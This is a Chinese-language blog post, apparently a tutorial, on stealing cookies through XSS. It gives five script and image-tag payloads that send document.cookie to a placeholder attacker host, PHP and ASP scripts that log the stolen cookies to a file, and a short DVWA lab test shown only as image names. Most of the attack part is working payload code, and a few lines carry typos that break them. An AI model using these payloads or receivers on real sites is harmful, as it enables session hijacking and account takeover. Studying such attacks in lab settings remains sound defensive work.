xss盗取cookie原理剖析

虽然cookie信息经过加密,即使被网络上一些别有用心的人截获也不必担心,但现在遇到的问题,窃取cookie的人不需要知道字符的含义,直接利用cookie通过服务器验证就可以冒充用户的身份

 假设一个网站有存储型xss(或反射xss),攻击者可以写入窃取cookie信息的恶意代码,在用户浏览xss网页时,触发恶意代码获取用户的cookie 

攻击者通常使用以下语句盗取用户cookie信息

<script>

document.location='http://your ip/cookie.php?cookie='+document.cookie;

</script>

<img src='http://your ip/cookie.php?cookie='+document.cookie></img>

<script>

new Image().src='http://your ip/cookie.php?cookie='+document.cookie;

</script>

<script>

img = new Image();

img.src='http://your ip/cookie.php?cookie='+document.cookie;

img.width = 0;

img.height = 0;

</script>

<script>

document.wirte('<img src='http://your ip/cookie.php?cookie='+document.cookie+ width=0 height=0 border=0 />');

</script>

在远程服务器,接受cookie代码

PHP版本

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>

ASP版本

<%
msg=Request . ServerVariables ("QUERY STRING")
testfile=Server . MapPath ("cookie. txt")
setfs=server .Create0bject ("scripting. filesystemobject")set thisfile=fs . OpenTextFile(testfile,8, True, 0)
thisfile. Writeline ("" &msg& "")
thisfile.close
set fs = nothing
%>

用DVWA靶场测试

修改页面最大长度限制

131be766877d4519a93ad4000e02c08b.png

 插入盗取cookie的恶意代码

f8da71f8018c413d9e720dcc140083eb.png

 查看接受cookie文件,可见盗取成功

50822696e86b47948976a23eb778e01c.png

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值